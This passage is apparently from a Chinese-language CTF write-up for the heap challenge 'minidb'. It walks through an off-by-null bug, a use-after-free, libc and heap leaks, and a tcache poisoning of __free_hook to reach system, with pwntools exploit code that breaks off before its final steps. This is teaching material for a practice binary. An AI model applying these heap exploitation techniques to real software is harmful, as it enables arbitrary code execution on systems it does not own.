r<span class="token punctuation">.</span>interactive<span class="token punctuation">(</span><span class="token punctuation">)</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<h2 id="minidb"><a href="#minidb" class="headerlink" title="minidb"></a>minidb</h2><p>就是说在现场没写不出来比赛完还是写不出来（），看了<code>wp</code>和解析终于看懂了呜呜</p>
<p>数据库堆题，保护全开，漏洞点如下</p>
<pre class="line-numbers language-C" data-language="C"><code class="language-C">if ( a1 )
  &#123;
    printf(&quot;Input the key: &quot;);
    __isoc99_scanf(&quot;%ld&quot;, &amp;v3);
    ptr &#x3D; sub_168D(a1, v3, 0LL);
    if ( ptr )
    &#123;
      printf(&quot;Input the new value: &quot;);
      __isoc99_scanf(&quot;%255s&quot;, value);
      len &#x3D; strlen(value);

      *(&amp;ptr-&gt;value + len) &#x3D; 0;                 &#x2F;&#x2F; strlen &lt;&#x3D;255 &amp;&amp; oob write \x00 
      if ( (a1-&gt;type &#x3D;&#x3D; 1 || a1-&gt;type &#x3D;&#x3D; 2) &amp;&amp; len &gt; 0x7F || (a1-&gt;type &#x3D;&#x3D; 3 || a1-&gt;type &#x3D;&#x3D; 4) &amp;&amp; len &gt; 0xFF )
      &#123;
        puts(&quot;\x1B[31m\x1B[1m[x] The length of new value is TOOOOOO LOOOOONG!\x1B[0m&quot;);
      &#125;
      else
      &#123;
        memcpy(&amp;ptr-&gt;value, value, len);
        *(&amp;ptr-&gt;value + len) &#x3D; 0;              
        puts(&quot;[+] Succesfully update the value of specific key!&quot;);
      &#125;
    &#125;
    else
    &#123;
      puts(&quot;\x1B[31m\x1B[1m[x] Key NOT FOUND!\x1B[0m&quot;);
    &#125;
  &#125;
  else
  &#123;
    puts(&quot;\x1B[31m\x1B[1m[x] Runtime error! No database provided!\x1B[0m&quot;);
  &#125;
  return __readfsqword(0x28u) ^ v6;
&#125;<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>虽然限制了在不同类型下的大小，但是在判断大小之前就会将最后一位赋为<code>0</code>，这里可以实现从该堆线下任意一个字节改为<code>0</code>，接下来开始构造堆</p>
<p>创建一个数据库与三个键值对，目的是在后续将下一个堆<code>name</code>地址末尾改成<code>0</code>时刚好在一个堆上</p>
<pre class="line-numbers language-python" data-language="python"><code class="language-python">add_db<span class="token punctuation">(</span><span class="token number">2</span><span class="token punctuation">,</span> <span class="token string">b'a'</span> <span class="token operator">*</span> <span class="token number">8</span><span class="token punctuation">)</span>

use<span class="token punctuation">(</span><span class="token string">b'a'</span> <span class="token operator">*</span> <span class="token number">8</span><span class="token punctuation">)</span>

add<span class="token punctuation">(</span><span class="token number">0</span><span class="token punctuation">,</span> <span class="token string">b'a'</span><span class="token punctuation">)</span>
add<span class="token punctuation">(</span><span class="token number">1</span><span class="token punctuation">,</span> <span class="token string">b'a'</span><span class="token punctuation">)</span>
add<span class="token punctuation">(</span><span class="token number">2</span><span class="token punctuation">,</span> <span class="token string">b'a'</span><span class="token punctuation">)</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<pre class="line-numbers language-none"><code class="language-none">pwndbg&gt; heap
Allocated chunk | PREV_INUSE
Addr: 0x558fca8d1000
Size: 0x291

Allocated chunk | PREV_INUSE
Addr: 0x558fca8d1290
Size: 0x821

Allocated chunk | PREV_INUSE
Addr: 0x558fca8d1ab0
Size: 0x21

Allocated chunk | PREV_INUSE
Addr: 0x558fca8d1ad0
Size: 0xa1

Allocated chunk | PREV_INUSE
Addr: 0x558fca8d1b70
Size: 0xa1

Allocated chunk | PREV_INUSE
Addr: 0x558fca8d1c10
Size: 0xa1

Top chunk | PREV_INUSE
Addr: 0x558fca8d1cb0
Size: 0x20351<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>再创建一个数据库之后用第一个数据库创建两个键值对并删除第二个键值对和第二个数据库，这样再次申请数据库时就可以让它的<code>name</code>落在这个堆</p>
<pre class="line-numbers language-python" data-language="python"><code class="language-python">add_db<span class="token punctuation">(</span><span class="token number">2</span><span class="token punctuation">,</span> <span class="token string">b'b'</span> <span class="token operator">*</span> <span class="token number">8</span><span class="token punctuation">)</span>

use<span class="token punctuation">(</span><span class="token string">b'a'</span> <span class="token operator">*</span> <span class="token number">8</span><span class="token punctuation">)</span>

add<span class="token punctuation">(</span><span class="token number">3</span><span class="token punctuation">,</span> <span class="token string">b'a'</span><span class="token punctuation">)</span>
add<span class="token punctuation">(</span><span class="token number">4</span><span class="token punctuation">,</span> <span class="token string">b'a'</span><span class="token punctuation">)</span>

delete<span class="token punctuation">(</span><span class="token number">4</span><span class="token punctuation">)</span>

out<span class="token punctuation">(</span><span class="token punctuation">)</span>

delete_db<span class="token punctuation">(</span><span class="token string">b'b'</span> <span class="token operator">*</span> <span class="token number">8</span><span class="token punctuation">)</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<pre class="line-numbers language-none"><code class="language-none">pwndbg&gt; heap
Allocated chunk | PREV_INUSE
Addr: 0x55b60aa00000
Size: 0x291

Allocated chunk | PREV_INUSE
Addr: 0x55b60aa00290
Size: 0x821

Allocated chunk | PREV_INUSE
Addr: 0x55b60aa00ab0
Size: 0x21

Allocated chunk | PREV_INUSE
Addr: 0x55b60aa00ad0
Size: 0xa1

Allocated chunk | PREV_INUSE
Addr: 0x55b60aa00b70
Size: 0xa1

Allocated chunk | PREV_INUSE
Addr: 0x55b60aa00c10
Size: 0xa1

Free chunk (unsortedbin) | PREV_INUSE
Addr: 0x55b60aa00cb0
Size: 0x821
fd: 0x7fd935e27be0
bk: 0x7fd935e27be0

Free chunk (tcache)
Addr: 0x55b60aa014d0
Size: 0x20
fd: 0x00

Allocated chunk | PREV_INUSE
Addr: 0x55b60aa014f0
Size: 0xa1

Free chunk (tcache) | PREV_INUSE
Addr: 0x55b60aa01590
Size: 0xa1
fd: 0x00

Top chunk | PREV_INUSE
Addr: 0x55b60aa01630
Size: 0x1f9d1<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>再次申请一个数据库且大小在<code>0x90</code>，此时会用到刚刚删除的数据库的管理和第一个数据库被释放掉的堆，刚好将第三个数据库的<code>name</code>地址低位改成<code>\x00</code>后落在第一个数据库的第四个堆上</p>
<pre class="line-numbers language-python" data-language="python"><code class="language-python">add_db<span class="token punctuation">(</span><span class="token number">2</span><span class="token punctuation">,</span> <span class="token string">b'b'</span> <span class="token operator">*</span> <span class="token number">0x90</span><span class="token punctuation">)</span>

use<span class="token punctuation">(</span><span class="token string">b'a'</span> <span class="token operator">*</span> <span class="token number">8</span><span class="token punctuation">)</span>
edit<span class="token punctuation">(</span><span class="token number">2</span><span class="token punctuation">,</span> <span class="token string">b'a'</span> <span class="token operator">*</span> <span class="token number">0x98</span><span class="token punctuation">)</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span></span></code></pre>

<pre class="line-numbers language-none"><code class="language-none">pwndbg&gt; heap
Allocated chunk | PREV_INUSE
Addr: 0x55ecd0d2f000
Size: 0x291

Allocated chunk | PREV_INUSE
Addr: 0x55ecd0d2f290
Size: 0x821

Allocated chunk | PREV_INUSE
Addr: 0x55ecd0d2fab0
Size: 0x21

Allocated chunk | PREV_INUSE
Addr: 0x55ecd0d2fad0
Size: 0xa1

Allocated chunk | PREV_INUSE
Addr: 0x55ecd0d2fb70
Size: 0xa1

Allocated chunk | PREV_INUSE
Addr: 0x55ecd0d2fc10
Size: 0xa1

Allocated chunk | PREV_INUSE
Addr: 0x55ecd0d2fcb0
Size: 0x821

Free chunk (tcache) | PREV_INUSE
Addr: 0x55ecd0d304d0
Size: 0x21
fd: 0x00

Allocated chunk | PREV_INUSE
Addr: 0x55ecd0d304f0
Size: 0xa1

Allocated chunk | PREV_INUSE
Addr: 0x55ecd0d30590
Size: 0xa1

Top chunk | PREV_INUSE
Addr: 0x55ecd0d30630
Size: 0x1f9d1<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<pre class="line-numbers language-none"><code class="language-none">pwndbg&gt; x&#x2F;10gx 0x55ecd0d2fcb0
0x55ecd0d2fcb0: 0x0000000000000000      0x0000000000000821
0x55ecd0d2fcc0: 0x0000000000000002      0x000055ecd0d30500<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre>

<p>此时释放掉第一个数据库的第四个堆并不会清除第三个数据库中的<code>name</code>地址，造成<code>UAF</code>，先填充<code>tcache</code>再释放掉这个堆，通过数据库名称列表泄露<code>libc</code></p>
<pre class="line-numbers language-python" data-language="python"><code class="language-python"><span class="token keyword">for</span> i <span class="token keyword">in</span> <span class="token builtin">range</span><span class="token punctuation">(</span><span class="token number">7</span><span class="token punctuation">)</span><span class="token punctuation">:</span>
    add<span class="token punctuation">(</span>i <span class="token operator">+</span> <span class="token number">4</span><span class="token punctuation">,</span> <span class="token string">b'a'</span><span class="token punctuation">)</span>

<span class="token keyword">for</span> i <span class="token keyword">in</span> <span class="token builtin">range</span><span class="token punctuation">(</span><span class="token number">7</span><span class="token punctuation">)</span><span class="token punctuation">:</span>
    delete<span class="token punctuation">(</span>i <span class="token operator">+</span> <span class="token number">4</span><span class="token punctuation">)</span>

delete<span class="token punctuation">(</span><span class="token number">3</span><span class="token punctuation">)</span>

out<span class="token punctuation">(</span><span class="token punctuation">)</span>
show_db<span class="token punctuation">(</span><span class="token punctuation">)</span>

libc_base <span class="token operator">=</span> u64<span class="token punctuation">(</span>r<span class="token punctuation">.</span>recvuntil<span class="token punctuation">(</span><span class="token string">b'\x7f'</span><span class="token punctuation">)</span><span class="token punctuation">[</span><span class="token operator">-</span><span class="token number">6</span><span class="token punctuation">:</span><span class="token punctuation">]</span><span class="token punctuation">.</span>ljust<span class="token punctuation">(</span><span class="token number">8</span><span class="token punctuation">,</span> <span class="token string">b'\x00'</span><span class="token punctuation">)</span><span class="token punctuation">)</span> <span class="token operator">-</span> <span class="token number">0x1ecbe0</span>
libc <span class="token operator">=</span> ELF<span class="token punctuation">(</span><span class="token string">'./2.31/libc-2.31.so'</span><span class="token punctuation">)</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<pre class="line-numbers language-none"><code class="language-none">[DEBUG] Received 0xf8 bytes:
    00000000  5b 2a 5d 20  59 6f 75 20  68 61 76 65  20 32 20 64  │[*] │You │have│ 2 d│
    00000010  61 74 61 62  61 73 65 20  6e 6f 77 2e  0a 46 6f 6c  │atab│ase │now.│·Fol│
    00000020  6c 6f 77 69  6e 67 20 69  73 20 79 6f  75 72 20 64  │lowi│ng i│s yo│ur d│
    00000030  61 74 61 62  73 65 73 3a  0a 0a 09 61  61 61 61 61  │atab│ses:│···a│aaaa│
    00000040  61 61 61 0a  09 e0 1b 5c  41 a3 7f 0a  0a 43 68 6f  │aaa·│···\│A···│·Cho│
    00000050  6f 73 65 20  79 6f 75 72  20 63 6f 6d  6d 61 6e 64  │ose │your│ com│mand│
    00000060  3a 0a 0a 31  2e 20 43 72  65 61 74 65  20 61 20 6e  │:··1│. Cr│eate│ a n│
    00000070  65 77 20 64  61 74 61 62  61 73 65 2e  0a 32 2e 20  │ew d│atab│ase.│·2. │
    00000080  55 73 65 20  61 20 64 61  74 61 62 61  73 65 2e 0a  │Use │a da│taba│se.·│
    00000090  33 2e 20 44  65 6c 65 74  65 20 61 20  64 61 74 61  │3. D│elet│e a │data│
    000000a0  62 61 73 65  2e 0a 34 2e  20 4c 69 73  74 20 74 68  │base│.·4.│ Lis│t th│
    000000b0  65 20 64 61  74 61 62 61  73 65 73 2e  0a 35 2e 20  │e da│taba│ses.│·5. │
    000000c0  43 68 61 6e  67 65 20 74  68 65 20 6e  61 6d 65 20  │Chan│ge t│he n│ame │
    000000d0  6f 66 20 61  20 64 61 74  61 62 61 73  65 2e 0a 36  │of a│ dat│abas│e.·6│
    000000e0  36 36 2e 20  45 78 69 74  2e 0a 0a 59  6f 75 72 20  │66. │Exit│.··Y│our │
    000000f0  63 68 6f 69  63 65 3a 20                            │choi│ce: │
    000000f8<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>再将释放的堆全部申请回来，单独释放一个堆和<code>name</code>中指向的堆中指向的堆，以此泄露堆地址，因为后续改数据库名称时需要<code>name</code>中的内容</p>
<pre class="line-numbers language-python" data-language="python"><code class="language-python">use<span class="token punctuation">(</span><span class="token string">b'a'</span> <span class="token operator">*</span> <span class="token number">8</span><span class="token punctuation">)</span>

<span class="token keyword">for</span> i <span class="token keyword">in</span> <span class="token builtin">range</span><span class="token punctuation">(</span><span class="token number">8</span><span class="token punctuation">)</span><span class="token punctuation">:</span>
    add<span class="token punctuation">(</span>i <span class="token operator">+</span> <span class="token number">4</span><span class="token punctuation">,</span> <span class="token string">b'a'</span><span class="token punctuation">)</span>

delete<span class="token punctuation">(</span><span class="token number">10</span><span class="token punctuation">)</span>
delete<span class="token punctuation">(</span><span class="token number">11</span><span class="token punctuation">)</span>

out<span class="token punctuation">(</span><span class="token punctuation">)</span>
show_db<span class="token punctuation">(</span><span class="token punctuation">)</span>

r<span class="token punctuation">.</span>recvuntil<span class="token punctuation">(</span><span class="token string">b'a'</span> <span class="token operator">*</span> <span class="token number">8</span> <span class="token operator">+</span> <span class="token string">b'\n'</span> <span class="token operator">+</span> <span class="token string">b'\t'</span><span class="token punctuation">)</span>
heap <span class="token operator">=</span> u64<span class="token punctuation">(</span>r<span class="token punctuation">.</span>recv<span class="token punctuation">(</span><span class="token number">6</span><span class="token punctuation">)</span><span class="token punctuation">.</span>ljust<span class="token punctuation">(</span><span class="token number">8</span><span class="token punctuation">,</span> <span class="token string">b'\x00'</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>改第三个数据库的名称为<code>free_hook</code>，此时修改的堆实际上已经被释放，因此能够改到<code>tcache</code>链表，需要注意的是数据路名称大小要是<code>0x90</code>，且改<code>free_hook</code>的时候<code>system</code>地址只能在后面否则会截断，因此要写入的地址是<code>free_hook - 0x88</code>，写入成功在创建一个<code>/bin/sh</code>并释放即可‘</p>
<p>exp：</p>
<pre class="line-numbers language-python" data-language="python"><code class="language-python"><span class="token keyword">from</span> pwn <span class="token keyword">import</span> <span class="token operator">*</span>

context<span class="token punctuation">(</span>arch<span class="token operator">=</span><span class="token string">'amd64'</span><span class="token punctuation">,</span> os<span class="token operator">=</span><span class="token string">'linux'</span><span class="token punctuation">,</span> log_level<span class="token operator">=</span><span class="token string">'debug'</span><span class="token punctuation">)</span>

file_name <span class="token operator">=</span> <span class="token string">'./pwn'</span>

li <span class="token operator">=</span> <span class="token keyword">lambda</span> x <span class="token punctuation">:</span> <span class="token keyword">print</span><span class="token punctuation">(</span><span class="token string">'\x1b[01;38;5;214m'</span> <span class="token operator">+</span> x <span class="token operator">+</span> <span class="token string">'\x1b[0m'</span><span class="token punctuation">)</span>
ll <span class="token operator">=</span> <span class="token keyword">lambda</span> x <span class="token punctuation">:</span> <span class="token keyword">print</span><span class="token punctuation">(</span><span class="token string">'\x1b[01;38;5;1m'</span> <span class="token operator">+</span> x <span class="token operator">+</span> <span class="token string">'\x1b[0m'</span><span class="token punctuation">)</span>

<span class="token comment">#context.terminal = ['tmux','splitw','-h']</span>

debug <span class="token operator">=</span> <span class="token number">0</span>
<span class="token keyword">if</span> debug<span class="token punctuation">:</span>
    r <span class="token operator">=</span> remote<span class="token punctuation">(</span><span class="token punctuation">)</span>
<span class="token keyword">else</span><span class="token punctuation">:</span>
    r <span class="token operator">=</span> process<span class="token punctuation">(</span>file_name<span class="token punctuation">)</span>

elf <span class="token operator">=</span> ELF<span class="token punctuation">(</span>file_name<span class="token punctuation">)</span>

<span class="token keyword">def</span> <span class="token function">dbg</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">:</span>
    gdb<span class="token punctuation">.</span>attach<span class="token punctuation">(</span>r<span class="token punctuation">)</span>

<span class="token keyword">def</span> <span class="token function">add</span><span class="token punctuation">(</span>key<span class="token punctuation">,</span> value<span class="token punctuation">)</span><span class="token punctuation">:</span>
    r<span class="token punctuation">.</span>recvuntil<span class="token punctuation">(</span><span class="token string">b"Your choice: "</span><span class="token punctuation">)</span>
    r<span class="token punctuation">.</span>sendline<span class="token punctuation">(</span><span class="token string">b"1"</span><span class="token punctuation">)</span>
    r<span class="token punctuation">.</span>recvuntil<span class="token punctuation">(</span><span class="token string">b"Input the key: "</span><span class="token punctuation">)</span>
    r<span class="token punctuation">.</span>sendline<span class="token punctuation">(</span><span class="token builtin">str</span><span class="token punctuation">(</span>key<span class="token punctuation">)</span><span class="token punctuation">.</span>encode<span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">)</span>
    r<span class="token punctuation">.</span>recvuntil<span class="token punctuation">(</span><span class="token string">b"Input the value: "</span><span class="token punctuation">)</span>
    r<span class="token punctuation">.</span>sendline<span class="token punctuation">(</span>value<span class="token punctuation">)</span>

<span class="token keyword">def</span> <span class="token function">show</span><span class="token punctuation">(</span>key<span class="token punctuation">)</span><span class="token punctuation">:</span>
    r<span class="token punctuation">.</span>recvuntil<span class="token punctuation">(</span><span class="token string">b"Your choice: "</span><span class="token punctuation">)</span>
    r<span class="token punctuation">.</span>sendline<span class="token punctuation">(</span><span class="token string">b"2"</span><span class="token punctuation">)</span>
    r<span class="token punctuation">.</span>recvuntil<span class="token punctuation">(</span><span class="token string">b"Input the key: "</span><span class="token punctuation">)</span>
    r<span class="token punctuation">.</span>sendline<span class="token punctuation">(</span><span class="token builtin">str</span><span class="token punctuation">(</span>key<span class="token punctuation">)</span><span class="token punctuation">.</span>encode<span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">)</span>

<span class="token keyword">def</span> <span class="token function">edit</span><span class="token punctuation">(</span>key<span class="token punctuation">,</span> value<span class="token punctuation">)</span><span class="token punctuation">:</span>
    r<span class="token punctuation">.</span>recvuntil<span class="token punctuation">(</span><span class="token string">b"Your choice: "</span><span class="token punctuation">)</span>
    r<span class="token punctuation">.</span>sendline<span class="token punctuation">(</span><span class="token string">b"3"</span><span class="token punctuation">)</span>
    r<span class="token punctuation">.</span>recvuntil<span class="token punctuation">(</span><span class="token string">b"Input the key: "</span><span class="token punctuation">)</span>
    r<span class="token punctuation">.</span>sendline<span class="token punctuation">(</span><span class="token builtin">str</span><span class="token punctuation">(</span>key<span class="token punctuation">)</span><span class="token punctuation">.</span>encode<span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">)</span>
    r<span class="token punctuation">.</span>recvuntil<span class="token punctuation">(</span><span class="token string">b"Input the new value: "</span><span class="token punctuation">)</span>
    r<span class="token punctuation">.</span>sendline<span class="token punctuation">(</span>value<span class="token punctuation">)</span>

<span class="token keyword">def</span> <span class="token function">delete</span><span class="token punctuation">(</span>key<span class="token punctuation">)</span><span class="token punctuation">:</span>
    r<span class="token punctuation">.</span>recvuntil<span class="token punctuation">(</span><span class="token string">b"Your choice: "</span><span class="token punctuation">)</span>
    r<span class="token punctuation">.</span>sendline<span class="token punctuation">(</span><span class="token string">b"4"</span><span class="token punctuation">)</span>
    r<span class="token punctuation">.</span>recvuntil<span class="token punctuation">(</span><span class="token string">b"Input the key: "</span><span class="token punctuation">)</span>
    r<span class="token punctuation">.</span>sendline<span class="token punctuation">(</span><span class="token builtin">str</span><span class="token punctuation">(</span>key<span class="token punctuation">)</span><span class="token punctuation">.</span>encode<span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">)</span>

<span class="token keyword">def</span> <span class="token function">out</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">:</span>
    r<span class="token punctuation">.</span>recvuntil<span class="token punctuation">(</span><span class="token string">b"Your choice: "</span><span class="token punctuation">)</span>
    r<span class="token punctuation">.</span>sendline<span class="token punctuation">(</span><span class="token string">b"666"</span><span class="token punctuation">)</span>

<span class="token keyword">def</span> <span class="token function">add_db</span><span class="token punctuation">(</span><span class="token builtin">type</span><span class="token punctuation">,</span> name<span class="token punctuation">)</span><span class="token punctuation">:</span>
    r<span class="token punctuation">.</span>recvuntil<span class="token punctuation">(</span><span class="token string">b"Your choice: "</span><span class="token punctuation">)</span>
    r<span class="token punctuation">.</span>sendline<span class="token punctuation">(</span><span class="token string">b"1"</span><span class="token punctuation">)</span>
    r<span class="token punctuation">.</span>recvuntil<span class="token punctuation">(</span><span class="token string">b"Please input the name of database: "</span><span class="token punctuation">)</span>
    r<span class="token punctuation">.</span>sendline<span class="token punctuation">(</span>name<span class="token punctuation">)</span>
    r<span class="token punctuation">.</span>recvuntil<span class="token punctuation">(</span><span class="token string">b"Please input the type of database: "</span><span class="token punctuation">)</span>
    r<span class="token punctuation">.</span>sendline<span class="token punctuation">(</span><span class="token builtin">str</span><span class="token punctuation">(</span><span class="token builtin">type</span><span class="token punctuation">)</span><span class="token punctuation">.</span>encode<span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">)</span>

<span class="token keyword">def</span> <span class="token function">use</span><span class="token punctuation">(</span>name<span class="token punctuation">)</span><span class="token punctuation">:</span>
    r<span class="token punctuation">.</span>recvuntil<span class="token punctuation">(</span><span class="token string">b"Your choice: "</span><span class="token punctuation">)</span>
    r<span class="token punctuation">.</span>sendline<span class="token punctuation">(</span><span class="token string">b"2"</span><span class="token punctuation">)</span>
    r<span class="token punctuation">.</span>recvuntil<span class="token punctuation">(</span><span class="token string">b"Please input the name of database: "</span><span class="token punctuation">)</span>
    r<span class="token punctuation">.</span>sendline<span class="token punctuation">(</span>name<span class="token punctuation">)</span>

<span class="token keyword">def</span> <span class="token function">delete_db</span><span class="token punctuation">(</span>name<span class="token punctuation">)</span><span class="token punctuation">:</span>
    r<span class="token punctuation">.</span>recvuntil<span class="token punctuation">(</span><span class="token string">b"Your choice: "</span><span class="token punctuation">)</span>
    r<span class="token punctuation">.</span>sendline<span class="token punctuation">(</span><span class="token string">b"3"</span><span class="token punctuation">)</span>
    r<span class="token punctuation">.</span>recvuntil<span class="token punctuation">(</span><span class="token string">b"Please input the name of database: "</span><span class="token punctuation">)</span>
    r<span class="token punctuation">.</span>sendline<span class="token punctuation">(</span>name<span class="token punctuation">)</span>

<span class="token keyword">def</span> <span class="token function">show_db</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">:</span>
    r<span class="token punctuation">.</span>recvuntil<span class="token punctuation">(</span><span class="token string">b"Your choice: "</span><span class="token punctuation">)</span>
    r<span class="token punctuation">.</span>sendline<span class="token punctuation">(</span><span class="token string">b"4"</span><span class="token punctuation">)</span>

<span class="token keyword">def</span> <span class="token function">edit_db</span><span class="token punctuation">(</span>orig_name<span class="token punctuation">,</span> new_name<span class="token punctuation">)</span><span class="token punctuation">:</span>
    r<span class="token punctuation">.</span>recvuntil<span class="token punctuation">(</span><span class="token string">b"Your choice: "</span><span class="token punctuation">)</span>
    r<span class="token punctuation">.</span>sendline<span class="token punctuation">(</span><span class="token string">b"5"</span><span class="token punctuation">)</span>
    r<span class="token punctuation">.</span>recvuntil<span class="token punctuation">(</span><span class="token string">b"Please input the name of database: "</span><span class="token punctuation">)</span>
    r<span class="token punctuation">.</span>sendline<span class="token punctuation">(</span>orig_name<span class="token punctuation">)</span>
    r<span class="token punctuation">.</span>recvuntil<span class="token punctuation">(</span><span class="token string">b"Please input the new name for database: "</span><span class="token punctuation">)</span>
    r<span class="token punctuation">.</span>sendline<span class="token punctuation">(</span>new_name<span class="token punctuation">)</span>

add_db<span class="token punctuation">(</span><span class="token number">2</span><span class="token punctuation">,</span> <span class="token string">b'a'</span> <span class="token operator">*</span> <span class="token number">8</span><span class="token punctuation">)</span>

use<span class="token punctuation">(</span><span class="token string">b'a'</span> <span class="token operator">*</span> <span class="token number">8</span><span class="token punctuation">)</span>

add<span class="token punctuation">(</span><span class="token number">0</span><span class="token punctuation">,</span> <span class="token string">b'a'</span><span class="token punctuation">)</span>
add<span class="token punctuation">(</span><span class="token number">1</span><span class="token punctuation">,</span> <span class="token string">b'a'</span><span class="token punctuation">)</span>
add<span class="token punctuation">(</span><span class="token number">2</span><span class="token punctuation">,</span> <span class="token string">b'a'</span><span class="token punctuation">)</span>

out<span class="token punctuation">(</span><span class="token punctuation">)</span>

add_db<span class="token punctuation">(</span><span class="token number">2</span><span class="token punctuation">,</span> <span class="token string">b'b'</span> <span class="token operator">*</span> <span class="token number">8</span><span class="token punctuation">)</span>

use<span class="token punctuation">(</span><span class="token string">b'a'</span> <span class="token operator">*</span> <span class="token number">8</span><span class="token punctuation">)</span>

add<span class="token punctuation">(</span><span class="token number">3</span><span class="token punctuation">,</span> <span class="token string">b'a'</span><span class="token punctuation">)</span>
add<span class="token punctuation">(</span><span class="token number">4</span><span class="token punctuation">,</span> <span class="token string">b'a'</span><span class="token punctuation">)</span>

delete<span class="token punctuation">(</span><span class="token number">4</span><span class="token punctuation">)</span>

out<span class="token punctuation">(</span><span class="token punctuation">)</span>

delete_db<span class="token punctuation">(</span><span class="token string">b'b'</span> <span class="token operator">*</span> <span class="token number">8</span><span class="token punctuation">)</span>

add_db<span class="token punctuation">(</span><span class="token number">2</span><span class="token punctuation">,</span> <span class="token string">b'b'</span> <span class="token operator">*</span> <span class="token number">0x90</span><span class="token punctuation">)</span>

use<span class="token punctuation">(</span><span class="token string">b'a'</span> <span class="token operator">*</span> <span class="token number">8</span><span class="token punctuation">)</span>
edit<span class="token punctuation">(</span><span class="token number">2</span><span class="token punctuation">,</span> <span class="token string">b'a'</span> <span class="token operator">*</span> <span class="token number">0x98</span><span class="token punctuation">)</span>

<span class="token keyword">for</span> i <span class="token keyword">in</span> <span class="token builtin">range</span><span class="token punctuation">(</span><span class="token number">7</span><span class="token punctuation">)</span><span class="token punctuation">:</span>
    add<span class="token punctuation">(</span>i <span class="token operator">+</span> <span class="token number">4</span><span class="token punctuation">,</span> <span class="token string">b'a'</span><span class="token punctuation">)</span>

<span class="token keyword">for</span> i <span class="token keyword">in</span> <span class="token builtin">range</span><span class="token punctuation">(</span><span class="token number">7</span><span class="token punctuation">)</span><span class="token punctuation">:</span>
    delete<span class="token punctuation">(</span>i <span class="token operator">+</span> <span class="token number">4</span><span class="token punctuation">)</span>

delete<span class="token punctuation">(</span><span class="token number">3</span><span class="token punctuation">)</span>

out<span class="token punctuation">(</span><span class="token punctuation">)</span>
show_db<span class="token punctuation">(</span><span class="token punctuation">)</span>

libc_base <span class="token operator">=</span> u64<span class="token punctuation">(</span>r<span class="token punctuation">.</span>recvuntil<span class="token punctuation">(</span><span class="token string">b'\x7f'</span><span class="token punctuation">)</span><span class="token punctuation">[</span><span class="token operator">-</span><span class="token number">6</span><span class="token punctuation">:</span><span class="token punctuation">]</span><span class="token punctuation">.</span>ljust<span class="token punctuation">(</span><span class="token number">8</span><span class="token punctuation">,</span> <span class="token string">b'\x00'</span><span class="token punctuation">)</span><span class="token punctuation">)</span> <span class="token operator">-</span> <span class="token number">0x1ecbe0</span>
libc <span class="token operator">=</span> ELF<span class="token punctuation">(</span><span class="token string">'./2.31/libc-2.31.so'</span><span class="token punctuation">)</span>
free_hook <span class="token operator">=</span> libc_base <span class="token operator">+</span> libc<span class="token punctuation">.</span>sym<span class="token punctuation">[</span><span class="token string">'__free_hook'</span><span class="token punctuation">]</span>
system <span class="token operator">=</span> libc_base <span class="token operator">+</span> libc<span class="token punctuation">.</span>sym<span class="token punctuation">[</span><span class="token string">'system'</span><span class="token punctuation">]</span>

use<span class="token punctuation">(</span><span class="token string">b'a'</span> <span class="token operator">*</span> <span class="token number">8</span><span class="token punctuation">)</span>

